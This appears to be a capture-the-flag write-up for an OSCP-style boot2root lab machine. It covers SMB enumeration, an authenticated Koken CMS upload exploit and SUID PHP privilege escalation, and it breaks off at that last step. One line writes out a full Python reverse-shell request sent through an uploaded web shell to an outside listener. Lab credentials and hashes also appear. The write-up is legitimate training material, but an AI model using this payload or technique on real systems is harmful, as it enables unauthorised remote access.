This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.
File. Not zipped strangely, so it’s a 2.6Gb download as an ova file.
Nmap
We’ve got four ports: SMB (139/445), HTTP on 80 and port 8000. If you guessed that’s a second HTTP port, you’re correct.
SMB
smbclient let me enumerate the shares, but didn’t seem to want to connect to the one we wanted:
But it’s okay, because impacket can help:
From these files, we get something immediately useful:
Webserver
The page on port 8000 seems to be the most interesting one, and it’s running a CMS called Koken, which is seemingly designed for photographic content. Running searchsploit shows an Authenticed RCE for a version of it, so that may be what we’re after.
gives us a page called /admin that allows login; it wants an email address and a password. We try it with daisa@photographer.com:babygirl and we’re in.
Authenticated RCE
Checking the searchsploit entry we find that after logging in we can upload PHP code in a file with a jpeg extension but then change the file extension in Burp Suite Repeater. So my request looks like this (sorry for the wall of text):
Then we go find that file and send it commands like this:
GET //storage//originals//93//9c//cmd.php?cmd=python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("192.168.1.77",1234))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b' HTTP/1.1
Which gets us a shell.
www-data
We’re on the box as www-data, but we can read the user flag from /home/daisa:
d41d8cd98f00b204e9800998ecf8427e
Now what?
Well, we can get the database credentials from here:
www-data@photographer:/$ mysql –host=127.0.0.1 –port 3306 -u kokenuser -p
mysql –host=127.0.0.1 –port 3306 -u kokenuser -p
Enter password: user_password_here
But the only user is daisa, and we already know her password so grabbing the hash ($2a$08$ruF3jtzIEZF1JMy/osNYj.ibzEiHWYCE4qsC6P/sMBZorx2ZTSGwK) isn’t very helpful.
Privesc
Running linpeas gives us a list of SUID binaries, and one of them is PHP. Although it doesn’t highlight it, this is our way in. GTFOBins shows the way: